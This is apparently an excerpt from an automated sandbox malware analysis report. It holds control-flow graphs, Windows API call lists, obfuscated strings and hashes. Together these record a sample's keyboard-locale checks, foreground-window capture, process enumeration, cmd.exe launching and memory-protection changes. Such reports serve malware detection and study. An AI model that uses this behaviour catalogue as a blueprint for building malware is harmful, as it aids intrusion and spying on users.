2308 404d2a call 413527 2305->2308 2310 404a27-404a44 2306->2310 2307->2310 2311 404a22 call 402980 2307->2311 2318 404d2f-404d34 call 413527 2308->2318 2315 404a46-404a5a call 40ef48 2310->2315 2316 404a8b-404a92 2310->2316 2311->2310 2315->2316 2325 404a5c-404a88 call 40f25b call 40eefe 2315->2325 2319 404ad3-404aed 2316->2319 2320 404a94-404ace 2316->2320 2323 404af4-404af9 2319->2323 2320->2319 2323->2323 2327 404afb-404b2a call 4026b0 call 404490 2323->2327 2325->2316 2336 404b72-404b79 2327->2336 2337 404b2c-404b40 call 40ef48 2327->2337 2338 404b9b-404bbc 2336->2338 2339 404b7b-404b94 2336->2339 2337->2336 2343 404b42-404b6f call 40f25b call 40eefe 2337->2343 2342 404bc0-404bc5 2338->2342 2339->2338 2342->2342 2344 404bc7-404bf8 call 4026b0 call 404490 2342->2344 2343->2336 2353 404c42-404c49 2344->2353 2354 404bfa-404c0e call 40ef48 2344->2354 2356 404c4b-404c69 2353->2356 2357 404c7d-404c9e 2353->2357 2354->2353 2361 404c10-404c3f call 40f25b call 40eefe 2354->2361 2359 404c70-404c7b 2356->2359 2360 404ca0-404ca5 2357->2360 2359->2357 2359->2359 2360->2360 2362 404ca7-404cb9 call 4026b0 call 404490 2360->2362 2361->2353 2369 404cbe-404cc3 2362->2369 2371 404cc5-404cc9 2369->2371 2372 404cd8 2369->2372 2371->2372 2373 404ccb-404ccf 2371->2373 2374 404cda-404ce0 2372->2374 2373->2372 2375 404cd1-404cd6 2373->2375 2376 404ce2-404cee 2374->2376 2377 404d0a-404d29 call 40ebbf 2374->2377 2375->2374 2378 404d00-404d07 call 40edff 2376->2378 2379 404cf0-404cfe 2376->2379 2378->2377 2379->2318 2379->2378
                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?,00000000), ref: 0040456D
                                          • FindNextFileA.KERNEL32(00000000,?,00000000,00000000,?,?), ref: 0040464A
                                          • FindClose.KERNEL32(00000000), ref: 00404655
                                          • __Init_thread_footer.LIBCMT ref: 004048E5
                                          • __Init_thread_footer.LIBCMT ref: 00404A83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileInit_thread_footer$CloseFirstNext
                                          • String ID: O@K\$\Desktop$mmBK${}k|
                                          • API String ID: 3881311970-1521651405
                                          • Opcode ID: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
                                          • Instruction ID: d59c19dc1825489004b71b5d951f6ac136d4c15861c1c7f922f70877673123c4
                                          • Opcode Fuzzy Hash: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
                                          • Instruction Fuzzy Hash: 503267B1D002448BDB14DF68DC457AEBBB1EF86304F14427EE9007B2D2D7B9A985CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2384 4096f0-409765 call 418873 call 417e17 2389 409768-40976d 2384->2389 2389->2389 2390 40976f-409858 call 4026b0 call 410b00 call 40c400 call 40c330 2389->2390 2399 409ee3 call 40dff9 2390->2399 2400 40985e-409860 2390->2400 2404 409ee8 call 4018b0 2399->2404 2402 4098d1 2400->2402 2403 409862-409868 2400->2403 2405 4098db-409912 call 40d710 2402->2405 2406 409891-40989a call 40edcf 2403->2406 2407 40986a-40986f 2403->2407 2413 409eed-409f2d call 4096d0 call 409f60 call 40b820 call 402510 call 40b4e0 call 402440 call 417cad 2404->2413 2418 409954-409972 2405->2418 2419 409914-40991e 2405->2419 2416 40989c-4098cf call 4104c0 2406->2416 2407->2404 2411 409875-409880 call 40edcf 2407->2411 2421 409f53-409f8d call 413527 2411->2421 2422 409886-40988f 2411->2422 2514 409f32 call 4054c0 2413->2514 2416->2405 2424 409978-409992 2418->2424 2425 409abf-409ad3 2418->2425 2427 409920-40992b call 40bb90 2419->2427 2428 40992d-409931 call 40d030 2419->2428 2455 409fca-409fdd call 40ebbf 2421->2455 2456 409f8f-409fa3 call 40ef48 2421->2456 2422->2416 2431 409994-4099a8 call 40ef48 2424->2431 2432 4099d6-4099dd 2424->2432 2436 409ad5-409ae9 call 40ef48 2425->2436 2437 409b0d-409b14 2425->2437 2439 409936-409952 call 40d710 2427->2439 2428->2439 2431->2432 2460 4099aa-4099d3 call 40f25b call 40eefe 2431->2460 2445 409a09-409a2f 2432->2445 2446 4099df-409a04 2432->2446 2436->2437 2457 409aeb-409b0a call 40f25b call 40eefe 2436->2457 2441 409b32-409b55 2437->2441 2442 409b16-409b2d 2437->2442 2439->2418 2439->2419 2453 409b58-409b5d 2441->2453 2442->2441 2450 409a30-409a35 2445->2450 2446->2445 2450->2450 2458 409a37-409a50 call 4026b0 2450->2458 2453->2453 2461 409b5f-409b8b call 4026b0 call 40ca60 2453->2461 2456->2455 2478 409fa5-409fc7 call 40f25b call 40eefe 2456->2478 2457->2437 2480 409a52-409a73 2458->2480 2481 409a75-409a8e call 40ce50 2458->2481 2460->2432 2490 409b91-409baa 2461->2490 2491 409c7e-409c89 2461->2491 2478->2455 2480->2425 2481->2425 2501 409a90-409a9f 2481->2501 2495 409bac-409bc0 call 40ef48 2490->2495 2496 409bef-409bf6 2490->2496 2498 409cc8-409cd1 2491->2498 2499 409c8b-409c94 2491->2499 2495->2496 2522 409bc2-409bec call 40f25b call 40eefe 2495->2522 2506 409bf8-409c16 2496->2506 2507 409c1b-409c3e 2496->2507 2510 409cd3-409ce2 2498->2510 2511 409d05-409d0c 2498->2511 2499->2498 2504 409c96-409ca5 2499->2504 2508 409aa1-409aaf 2501->2508 2509 409ab5-409abc call 40edff 2501->2509 2515 409ca7-409cb5 2504->2515 2516 409cbb-409cc5 call 40edff 2504->2516 2506->2507 2517 409c41-409c46 2507->2517 2508->2421 2508->2509 2509->2425 2519 409ce4-409cf2 2510->2519 2520 409cf8-409d02 call 40edff 2510->2520 2511->2413 2512 409d12-409d2b 2511->2512 2512->2514 2521 409d31 2512->2521 2528 409f37-409f4e call 40b910 call 40bb90 call 409500 2514->2528 2515->2421 2515->2516 2516->2498 2517->2517 2525 409c48-409c74 call 4026b0 call 40ca60 2517->2525 2519->2421 2519->2520 2520->2511 2521->2528 2529 409d37-409d3a 2521->2529 2522->2496 2525->2491 2555 409c76-409c7c 2525->2555 2528->2421 2534 409d40-409d46 2529->2534 2535 409dd8-409dde 2529->2535 2540 409d48 2534->2540 2541 409d4a-409d4e 2534->2541 2544 409de0-409dec 2535->2544 2545 409e0c-409e93 call 40a510 call 40e4d3 call 40b930 2535->2545 2540->2541 2550 409d50-409d55 2541->2550 2551 409d79-409d7f 2541->2551 2546 409e02-409e09 call 40edff 2544->2546 2547 409dee-409dfc 2544->2547 2579 409ec3-409ee0 call 40ebbf 2545->2579 2580 409e95-409ea3 2545->2580 2546->2545 2547->2421 2547->2546 2557 409d57-409d59 2550->2557 2558 409d5b-409d5d 2550->2558 2560 409d81 2551->2560 2561 409d83-409d87 2551->2561 2555->2499 2565 409d60-409d62 2557->2565 2558->2565 2560->2561 2561->2535 2562 409d89-409d8e 2561->2562 2567 409d90-409d96 2562->2567 2568 409d9c-409d9e 2562->2568 2565->2551 2570 409d64-409d77 call 417df6 2565->2570 2567->2568 2571 409d98-409d9a 2567->2571 2572 409da1-409da3 2568->2572 2581 409db8-409dd5 Sleep call 40bb90 call 408d00 2570->2581 2571->2572 2572->2535 2575 409da5-409db2 call 417df6 2572->2575 2575->2581 2585 409ea5-409eb3 2580->2585 2586 409eb9-409ec0 call 40edff 2580->2586 2581->2535 2585->2421 2585->2586 2586->2579
                                          APIs
                                            • Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
                                            • Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7
                                          • __Init_thread_footer.LIBCMT ref: 004099CE
                                          • __Init_thread_footer.LIBCMT ref: 00409B05
                                          • __Init_thread_footer.LIBCMT ref: 00409BE7
                                          • Sleep.KERNEL32(?,00450F1C,00450F1D,?,?,?), ref: 00409DB9
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409E7D
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00409EE3
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00409EE8
                                            • Part of subcall function 004018B0: ___std_exception_copy.LIBVCRUNTIME ref: 004018EE
                                            • Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32(DCBD048B), ref: 004054EC
                                            • Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32 ref: 00405508
                                            • Part of subcall function 004054C0: ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4
                                            • Part of subcall function 00409500: CreateThread.KERNEL32 ref: 004095FE
                                            • Part of subcall function 00409500: Sleep.KERNEL32(00000BB8), ref: 00409609
                                          • __Init_thread_footer.LIBCMT ref: 00409FC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcessSleepTime$CreateExecuteFileIos_base_dtorShellSystemThreadUnothrow_t@std@@@___std_exception_copy__ehfuncinfo$??2@std::ios_base::_
                                          • String ID: D@$MFE.$ZK]Z
                                          • API String ID: 3757312541-2629744079
                                          • Opcode ID: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
                                          • Instruction ID: 09b12323e8cf1ccab507edc46462649b34e9962f34bdcbd7157f6d7b385d370e
                                          • Opcode Fuzzy Hash: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
                                          • Instruction Fuzzy Hash: B232E0759002488BDB24DF68D845BEEB7B0AF45308F1441BAE805773D3D779AE88CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2593 405f40-405f9f 2594 405fa1-405fb5 call 40ef48 2593->2594 2595 405fe8-405fef 2593->2595 2594->2595 2601 405fb7-405fe5 call 40f25b call 40eefe 2594->2601 2597 405ff1-406024 2595->2597 2598 406029-40604a 2595->2598 2597->2598 2600 406050-406055 2598->2600 2600->2600 2602 406057-406070 call 4026b0 call 405350 2600->2602 2601->2595 2611 406076-406095 2602->2611 2612 4065ae 2602->2612 2613 406097-4060ab call 40ef48 2611->2613 2614 4060de-4060e5 2611->2614 2615 4065b0-4065cb call 40ebbf 2612->2615 2613->2614 2623 4060ad-4060db call 40f25b call 40eefe 2613->2623 2617 4060e7-40611a 2614->2617 2618 40611f-406139 2614->2618 2617->2618 2621 406140-406145 2618->2621 2621->2621 2624 406147-406160 call 4026b0 call 405350 2621->2624 2623->2614 2624->2612 2633 406166-40618e 2624->2633 2634 406190-4061a4 call 40ef48 2633->2634 2635 4061dd-4061e4 2633->2635 2634->2635 2641 4061a6-4061da call 40f25b call 40eefe 2634->2641 2637 4061e6-406227 2635->2637 2638 40622c-40624d 2635->2638 2637->2638 2640 406250-406255 2638->2640 2640->2640 2642 406257-406270 call 4026b0 call 405350 2640->2642 2641->2635 2642->2612 2651 406276-40627e GetForegroundWindow 2642->2651 2652 406284-4062cb GetWindowTextA 2651->2652 2653 4065aa-4065ac 2651->2653 2654 40632b-406332 2652->2654 2655 4062cd-4062e1 call 40ef48 2652->2655 2653->2615 2657 406342-40636f 2654->2657 2658 406334 2654->2658 2655->2654 2663 4062e3-406328 call 40f25b call 40eefe 2655->2663 2660 406370-406375 2657->2660 2659 406336-406340 2658->2659 2659->2657 2659->2659 2660->2660 2662 406377-4063c2 call 4026b0 call 4101e0 2660->2662 2672 406502 2662->2672 2673 4063c8-4063f0 2662->2673 2663->2654 2676 406509-40650c 2672->2676 2674 4063f2-406406 call 40ef48 2673->2674 2675 40643f-406446 2673->2675 2674->2675 2690 406408-40643c call 40f25b call 40eefe 2674->2690 2677 406448-406489 2675->2677 2678 40648e-4064b1 2675->2678 2680 406566-406569 2676->2680 2681 40650e-40651a 2676->2681 2677->2678 2682 4064b4-4064b9 2678->2682 2683 4065a1-4065a8 2680->2683 2684 40656b-406574 2680->2684 2686 40654b-40655f 2681->2686 2687 40651c-40652b 2681->2687 2682->2682 2688 4064bb-406500 call 4026b0 call 4101e0 2682->2688 2683->2612 2683->2653 2684->2683 2689 406576-406585 2684->2689 2686->2680 2691 406541-406548 call 40edff 2687->2691 2692 40652d-40653b 2687->2692 2688->2672 2688->2676 2695 406597-40659e call 40edff 2689->2695 2696 406587-406595 2689->2696 2690->2675 2691->2686 2692->2691 2698 4065cc-4065d1 call 413527 2692->2698 2695->2683 2696->2695 2696->2698
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00405FE0
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          • __Init_thread_footer.LIBCMT ref: 004061D5
                                          • GetForegroundWindow.USER32 ref: 00406276
                                          • GetWindowTextA.USER32 ref: 00406291
                                          • __Init_thread_footer.LIBCMT ref: 00406323
                                          • __Init_thread_footer.LIBCMT ref: 004060D6
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 00406437
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer$CriticalSection$EnterLeaveWindow$ConditionForegroundTextVariableWake
                                          • String ID: E.$fOMEK\YG\K]FO\E.$yG\K$~\AM
                                          • API String ID: 1590647277-3754284071
                                          • Opcode ID: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
                                          • Instruction ID: e9c2673cefaa3185768bab40f11baeefcd31a664600fc35e2933cd877b2fe628
                                          • Opcode Fuzzy Hash: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
                                          • Instruction Fuzzy Hash: 7EF107799003848ADB35DB34EC067EA7B70AB05319F1405FED8492A2D3D7F99A98CB4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2710 402bf0-402c07 2711 402c49-402c5d call 40ebbf 2710->2711 2712 402c09-402c12 2710->2712 2713 402c14-402c19 2712->2713 2714 402c5e-402ca0 VirtualProtect 2712->2714 2713->2711 2718 402c1b-402c20 2713->2718 2714->2711 2717 402ca2-402cc4 GetLastError FormatMessageA 2714->2717 2719 402cc7-402ccc 2717->2719 2720 402c22-402c2a 2718->2720 2721 402c36-402c43 call 402eb0 2718->2721 2719->2719 2722 402cce-402d1a LocalAlloc call 402b20 LocalFree * 2 call 40ebbf 2719->2722 2720->2721 2723 402c2c-402c34 2720->2723 2726 402c45 2721->2726 2723->2721 2725 402c48 2723->2725 2725->2711 2726->2725
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,?,?,?,00403426), ref: 00402C98
                                          • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00403426), ref: 00402CAD
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00403426), ref: 00402CBB
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00403426), ref: 00402CD6
                                          • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402CF5
                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402D02
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,00403426), ref: 00402D07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                          • String ID: %s: %s$&4@$0Zhv$Error protecting memory page
                                          • API String ID: 839691724-196108988
                                          • Opcode ID: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
                                          • Instruction ID: 56ecb5147128ac6811eeaed226ebfad5a34a2763694ba038d08261f378adde64
                                          • Opcode Fuzzy Hash: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
                                          • Instruction Fuzzy Hash: D6312531B00114AFE714AF69DC44FAEB769EF45300F1401AAE901AB2D1CAB5AD02CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2943 404840-4048a6 2944 4048a8-4048bc call 40ef48 2943->2944 2945 4048ed-4048f4 2943->2945 2944->2945 2952 4048be-4048ea call 40f25b call 40eefe 2944->2952 2946 4048f6-4048f8 2945->2946 2947 40490d-40492e 2945->2947 2949 404900-40490b 2946->2949 2950 404930-404935 2947->2950 2949->2947 2949->2949 2950->2950 2953 404937-40497f call 4026b0 call 418b65 2950->2953 2952->2945 2962 404982-404987 2953->2962 2962->2962 2963 404989-40499f call 4026b0 2962->2963 2966 4049a1-4049ad 2963->2966 2967 4049cd-4049f3 2963->2967 2968 4049c3-4049ca call 40edff 2966->2968 2969 4049af-4049bd 2966->2969 2970 4049f5-404a14 call 4104c0 2967->2970 2971 404a16-404a20 2967->2971 2968->2967 2969->2968 2972 404d2a call 413527 2969->2972 2974 404a27-404a44 2970->2974 2971->2974 2975 404a22 call 402980 2971->2975 2982 404d2f-404d34 call 413527 2972->2982 2979 404a46-404a5a call 40ef48 2974->2979 2980 404a8b-404a92 2974->2980 2975->2974 2979->2980 2989 404a5c-404a88 call 40f25b call 40eefe 2979->2989 2983 404ad3-404aed 2980->2983 2984 404a94-404ace 2980->2984 2987 404af4-404af9 2983->2987 2984->2983 2987->2987 2991 404afb-404b2a call 4026b0 call 404490 2987->2991 2989->2980 3000 404b72-404b79 2991->3000 3001 404b2c-404b40 call 40ef48 2991->3001 3002 404b9b-404bbc 3000->3002 3003 404b7b-404b94 3000->3003 3001->3000 3007 404b42-404b6f call 40f25b call 40eefe 3001->3007 3006 404bc0-404bc5 3002->3006 3003->3002 3006->3006 3008 404bc7-404bf8 call 4026b0 call 404490 3006->3008 3007->3000 3017 404c42-404c49 3008->3017 3018 404bfa-404c0e call 40ef48 3008->3018 3020 404c4b-404c69 3017->3020 3021 404c7d-404c9e 3017->3021 3018->3017 3025 404c10-404c3f call 40f25b call 40eefe 3018->3025 3023 404c70-404c7b 3020->3023 3024 404ca0-404ca5 3021->3024 3023->3021 3023->3023 3024->3024 3026 404ca7-404cc3 call 4026b0 call 404490 3024->3026 3025->3017 3035 404cc5-404cc9 3026->3035 3036 404cd8 3026->3036 3035->3036 3037 404ccb-404ccf 3035->3037 3038 404cda-404ce0 3036->3038 3037->3036 3039 404cd1-404cd6 3037->3039 3040 404ce2-404cee 3038->3040 3041 404d0a-404d29 call 40ebbf 3038->3041 3039->3038 3042 404d00-404d07 call 40edff 3040->3042 3043 404cf0-404cfe 3040->3043 3042->3041 3043->2982 3043->3042
                                          APIs
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 004048E5
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          • __Init_thread_footer.LIBCMT ref: 00404A83
                                          • __Init_thread_footer.LIBCMT ref: 00404B6A
                                          • __Init_thread_footer.LIBCMT ref: 00404C3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInit_thread_footerSection$EnterLeave$ConditionVariableWake
                                          • String ID: O@K\$\Desktop$mmBK${}k|
                                          • API String ID: 4264893276-1521651405
                                          • Opcode ID: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
                                          • Instruction ID: c12f54c9c6adfdaa1c56a5fc3e30a9e30d2afb8bc8bcc1abd1d89b7747afa6d4
                                          • Opcode Fuzzy Hash: 8df569c9253b2e4154696794805b32007486ec4b4e197a8cb0baa30961dbfd60
                                          • Instruction Fuzzy Hash: 82D136B59003848BEB14DF78EC067AE7B70AB45308F14427ED9403B2D3D7B9A949CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3048 401b30-401bf3 InternetSetFilePointer InternetReadFile 3050 401c2d-401c70 call 410b00 HttpQueryInfoA 3048->3050 3054 401fd5-402003 call 40ebbf 3050->3054 3055 401c76-401ca9 CoCreateInstance 3050->3055 3055->3054 3057 401caf-401cb6 3055->3057 3057->3054 3059 401cbc-401cea 3057->3059 3060 401cf0-401cf5 3059->3060 3060->3060 3061 401cf7-401db8 call 4026b0 MultiByteToWideChar call 40ee0d MultiByteToWideChar 3060->3061 3066 401dc0-401dc9 3061->3066 3066->3066 3067 401dcb-401e89 call 402550 call 40ebcd 3066->3067 3074 401eba-401ebc 3067->3074 3075 401e8b-401e9a 3067->3075 3078 401ec2-401ec9 3074->3078 3079 401fc9-401fd0 3074->3079 3076 401eb0-401eb7 call 40edff 3075->3076 3077 401e9c-401eaa 3075->3077 3076->3074 3077->3076 3080 402006-40200b call 413527 3077->3080 3078->3079 3082 401ecf-401f43 call 40ee0d 3078->3082 3079->3054 3089 401f45-401f53 3082->3089 3090 401faf-401fc5 call 40ebcd 3082->3090 3092 401f55-401f8b call 40ee0d call 401760 call 40ebcd 3089->3092 3093 401f8d 3089->3093 3090->3079 3094 401f90-401fac call 401760 3092->3094 3093->3094 3094->3090
                                          APIs
                                          • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401BB5
                                          • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401BD4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileInternet$PointerRead
                                          • String ID: text
                                          • API String ID: 3197321146-999008199
                                          • Opcode ID: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
                                          • Instruction ID: 0e1f74b2381a2c47a752bf63778d692da1f3e37b415f6d44e4533426c8fd4264
                                          • Opcode Fuzzy Hash: cfdcce2f7d42716a26e30f2f88d0c2f3e955756d4473bc2f3cae5c265880f9cb
                                          • Instruction Fuzzy Hash: FDC17A70A002189FEB24CF25CD85BEAB7B9FF48704F1045E9E40AA7291DB75AE85CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetKeyboardLayoutList.USER32(00000400,?,DCBD048B), ref: 00404DD8
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D
                                          • __Init_thread_footer.LIBCMT ref: 00404FE8
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterInfoInit_thread_footerKeyboardLayoutLeaveListLocaleVariableWake
                                          • String ID: GO@.$|[]]$|[]]GO@.
                                          • API String ID: 4140350330-2383573185
                                          • Opcode ID: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
                                          • Instruction ID: 94e34afb144a66a85c58054fe8ab4e0848c0f8c8b7af94ec091aa244651e6c2c
                                          • Opcode Fuzzy Hash: ec2d637ad3e7bc1ee14cb4dca0750debf56f2c276a93391e24e87bf3bab5fd92
                                          • Instruction Fuzzy Hash: 7EE1C371D002598BDB14CF68CC847EEBBB1EF49314F14466AE405B72C2DB79AA84CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404D40: GetKeyboardLayoutList.USER32(00000400,?,DCBD048B), ref: 00404DD8
                                            • Part of subcall function 00404D40: GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00404E0D
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 00404FE8
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInfoInit_thread_footerKeyboardLayoutListLocaleVariableWake
                                          • String ID: GO@.$|[]]$|[]]GO@.
                                          • API String ID: 960455753-2383573185
                                          • Opcode ID: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
                                          • Instruction ID: 3f3761a2ce6209ac4365e9edb3218e4554d877b29476edc6aaeebbc4e421452e
                                          • Opcode Fuzzy Hash: 58e962a3c83b38df1713b6c3c7ae518e95050e33851920dfad0a4c97fcebbe43
                                          • Instruction Fuzzy Hash: F581B375D002598BDB14DFA8D8857AFBBB0EF09314F54027AE401BB3D2D778A948CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040536A
                                          • Process32First.KERNEL32(00000000,00000128), ref: 00405384
                                          • Process32Next.KERNEL32 ref: 004053BB
